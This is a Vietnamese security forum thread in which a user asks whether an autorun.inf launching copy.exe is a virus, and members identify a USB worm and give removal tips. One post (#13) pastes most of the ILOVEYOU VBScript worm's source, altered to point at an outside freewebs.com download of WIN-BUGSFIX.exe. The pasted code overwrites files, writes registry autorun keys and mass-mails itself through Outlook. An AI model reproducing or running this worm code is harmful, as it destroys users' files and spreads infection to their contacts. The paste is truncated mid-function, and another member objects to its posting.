banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Đây có fải là virus ???  XML
  [Question]   Đây có fải là virus ??? 01/12/2006 13:40:40 (+0700) | #1 | 27303
[Avatar]
cigcof
Member

[Minus]    0    [Plus]
Joined: 19/04/2006 09:47:48
Messages: 17
Offline
[Profile] [PM]
Hôm nay thằng bạn sách ổ cứng qua máy của mình chép ít tài liệu. Nó bảo nó có 1 file autorun.inf trong hdd mà xóa mãi không được. Khi mình click vào thì tự động lây sang hết các ổ còn lại. Mình đã thử vào bằng chế độ safe mode để del mà cũng ko hết, nghĩ nó là virus nhưng sau khi dùng Kaspersky 6.0 quét thì cũng ko thấy cảnh báo nào. Bạn nào biết cách loại bỏ file này có thể giúp mình đựoc ko ? Cảm ơn !

Nội dung file autorun.inf
Code:
[autorun]
Shellexecute=copy.exe
[Up] [Print Copy]
  [Question]   Đây có fải là virus ??? 02/12/2006 00:13:43 (+0700) | #2 | 27353
mfeng
Researcher

Joined: 29/10/2004 15:16:29
Messages: 243
Offline
[Profile] [PM]
Coi có file copy.exe trong thư mục gốc cùng với file autorun.inf không ? Dùng av (nhớ update) scan file exe đó. Nếu không phát hiện gì thì cứ đưa file exe lên đây smilie.
[Up] [Print Copy]
  [Question]   Re: Đây có fải là virus ??? 02/12/2006 09:30:30 (+0700) | #3 | 27458
[Avatar]
cigcof
Member

[Minus]    0    [Plus]
Joined: 19/04/2006 09:47:48
Messages: 17
Offline
[Profile] [PM]
Mình rất tiếc là không có file nào có tên là copy.exe trong thư mục gốc cả. Search hết các ổ thì chỉ có file xcopy.exe trong system32 thôi. smilie
[Up] [Print Copy]
  [Question]   Re: Đây có fải là virus ??? 04/12/2006 13:00:17 (+0700) | #4 | 27829
Tigon4U
Member

[Minus]    0    [Plus]
Joined: 04/12/2006 00:56:09
Messages: 1
Offline
[Profile] [PM]
Thua bạn luôn rồi, xcopy là lệnh ngoại trú của DOS thì phải :?smilie còn nếu không có thì để file .inf đó làm quái gì ?
[Up] [Print Copy]
  [Question]   Re: Đây có fải là virus ??? 05/12/2006 01:48:02 (+0700) | #5 | 27915
[Avatar]
cigcof
Member

[Minus]    0    [Plus]
Joined: 19/04/2006 09:47:48
Messages: 17
Offline
[Profile] [PM]

Tigon4U wrote:
để file .inf đó làm quái gì ? 

Ặc ặc !!! vì ko xóa được tớ mới đem vấn đề lên đây hỏi. Chứ bạn tưởng tôi thích để nó nằm trong máy của mình sao ? smilie
[Up] [Print Copy]
  [Question]   Đây có fải là virus ??? 05/12/2006 01:59:28 (+0700) | #6 | 27918
nhutdm
Elite Member

[Minus]    0    [Plus]
Joined: 02/06/2003 12:40:50
Messages: 45
Offline
[Profile] [PM] [WWW]
Cái nì là autorun.ini mà bác... Khi nhấp vào ổ đĩa cứng có chứa nội dung tập tin này thì nó sẽ tự chạy copy.exe... Dùng BKAV quét, thường thì cái nì là Flashy hoặc mấy thứ worm cũ rồi!
[Up] [Print Copy]
  [Question]   Re: Đây có fải là virus ??? 05/12/2006 03:32:08 (+0700) | #7 | 27929
[Avatar]
canh_nguyen
Elite Member

[Minus]    0    [Plus]
Joined: 23/08/2004 18:55:09
Messages: 775
Location: Broken dream
Offline
[Profile] [PM] [WWW] [Yahoo!] [MSN] [ICQ]

cigcof wrote:
Mình rất tiếc là không có file nào có tên là copy.exe trong thư mục gốc cả. Search hết các ổ thì chỉ có file xcopy.exe trong system32 thôi. smilie  


Bạn có mở chế độ hiện file ẩn lên không thế. Chắc chắn nó đặt thuộc tính ẩn cho file đó.

Cái dòng
Code:
[autorun]
 Shellexecute=copy.exe

là để nó chạy file copy.exe mỗi khi bạn mở usb hoặc HDD bằng cách kích đúp chuột bình thường hoặc nếu máy bạn để chế độ cho phép autorun.

Hồi rộ lên con Rontok(con nì của bạn có vẻ giống con Rontok) tui toàn mở usb và HDD bằng cách kích chuột phải chọn open nếu trông menu có cái dòng autorun là nghi nghi.^^
[Up] [Print Copy]
  [Question]   Đây có fải là virus ??? 05/12/2006 22:34:15 (+0700) | #8 | 28106
[Avatar]
eyesdog
Elite Member

[Minus]    0    [Plus]
Joined: 18/01/2002 06:54:01
Messages: 94
Offline
[Profile] [PM]
Đó là một con virus do người Việt viết. Nó chỉ có tính năng copy sang các ổ USB được cắm vào máy, killtask nó trước thì sẽ xóa được nó. Tôi nghĩ nó mới chỉ dừng ở mức độ thử nghiệm, chưa thấy dấu hiệu phá hoại. Xem qua 1ph rồi xóa luôn vì timeout.
[Up] [Print Copy]
  [Question]   Re: Đây có fải là virus ??? 06/12/2006 07:08:59 (+0700) | #9 | 28210
[Avatar]
phamhieu1998
Member

[Minus]    0    [Plus]
Joined: 11/09/2006 18:27:21
Messages: 42
Location: My father - My mother
Offline
[Profile] [PM]
" xóa mãi mà không được " cách đơn giản nhất la sống chung với nó thôi nếu nó không gây ra vấn đề gì với máy tính của bạn.
[Up] [Print Copy]
  [Question]   Re: Đây có fải là virus ??? 07/12/2006 04:31:07 (+0700) | #10 | 28515
[Avatar]
cigcof
Member

[Minus]    0    [Plus]
Joined: 19/04/2006 09:47:48
Messages: 17
Offline
[Profile] [PM]
Đúng như eyesdog nói thì nó không phá hoại gì cả. Nhưng tớ đã quyết định format và install lại thì nó mới chịu "lên thiên" smilie) . Cảm ơn các bạn nhiều, một số thông tin thật hữu ích :wink:
[Up] [Print Copy]
  [Question]   Đây có fải là virus ??? 07/12/2006 05:43:20 (+0700) | #11 | 28536
[Avatar]
PhuongDT
Member

[Minus]    0    [Plus]
Joined: 19/04/2005 02:36:42
Messages: 41
Location: HVA
Offline
[Profile] [PM]
Phí quá, bro đã format rồi à? Con này dễ diệt thôi mà
[Up] [Print Copy]
  [Question]   Đây có fải là virus ??? 09/12/2006 02:24:32 (+0700) | #12 | 29097
[Avatar]
BLUEEAGLE987
Member

[Minus]    0    [Plus]
Joined: 30/11/2006 18:05:00
Messages: 77
Offline
[Profile] [PM] [WWW] [Yahoo!]
Con này giống như trojan tạo file flashy ... mình có thể vào dos thực xóa nó chắc cũng dc chỉ ngại là nó có khóa trong reg giúp tự tạo file khác.
[Up] [Print Copy]
  [Question]   Đây có fải là virus ??? 13/12/2006 04:05:46 (+0700) | #13 | 30139
[Avatar]
hack9x
Member

[Minus]    0    [Plus]
Joined: 11/12/2006 23:15:02
Messages: 20
Location: hà nội
Offline
[Profile] [PM] [WWW]
THEO CÁC BẠN ĐOẠN MÃ LÀY CÓ PHẢI VIRUS KHÔNG



rem barok -loveletter(vbe)
rem by: spyder / email / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname ,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder (0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.freewebs.com/quynhkheonline/index.htm
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.freewebs.com/quynhkheonlineindex.htm

546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page"," http://www.freewebs.com/quynhkheonline/index.htm

POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page"," http://www.freewebs.com/quynhkheonline/index.htm

YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\WIN-BUGSFI
X",downread&"\WIN- BUGSFIX.exe "
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about :blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase( f1.name )
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path& ".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile (f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s=" mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject(" WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject(" Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead ("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="
[Up] [Print Copy]
  [Question]   Đây có fải là virus ??? 25/12/2006 03:43:28 (+0700) | #14 | 32559
DAZAI
Member

[Minus]    0    [Plus]
Joined: 07/11/2004 16:20:04
Messages: 4
Offline
[Profile] [PM]
các bác lắm chuyện quá.mỗi cái con virus để chêu bạn bè ấy mà cũng lắm cách gỡ thế.
mở chế độ file ẩn lên ở ổ đĩa nào chẳng có.nếu không xóa hết thì lần sau nó lại chạy tiếp và copy sang các ổ khác.vào dos vào thư mục gốc c:\ ;d:\ e:\................. xóa 3 file copy.exe, autorun.inf,và hình như là file host... gì đấy tui cung không nhớ.xóa song là ok ngay.
[Up] [Print Copy]
  [Question]   Đây có fải là virus ??? 25/12/2006 07:12:53 (+0700) | #15 | 32595
[Avatar]
tmd
Member

[Minus]    0    [Plus]
Joined: 28/06/2006 03:39:48
Messages: 2951
Offline
[Profile] [PM]
Con Flashy đó bạn ơi, file copy.exe đã được hide đi rồi, kiêm nó bằng trình duyệt explorer không có ra đâu.

Ba nội trên kia cũng hay thiệt, chui vào trốn này để thả mấy cái code để làm virus, link có code độc nửa, mod làm việc đi cho rồi.

File copy.exe không trực tiếp nằm trên ổ D,E,... đâu, nó vẫn nằm trong thư mục windows, thư mục rác của user trong Documents and Settings,...


3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...
[Up] [Print Copy]
  [Question]   Re: Đây có fải là virus ??? 21/01/2007 01:12:09 (+0700) | #16 | 37312
DAZAI
Member

[Minus]    0    [Plus]
Joined: 07/11/2004 16:20:04
Messages: 4
Offline
[Profile] [PM]
ông đã bị dính chưa mà nói.tui đã bị dính và từ kinh nghiệm tui giai quyết cái một
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|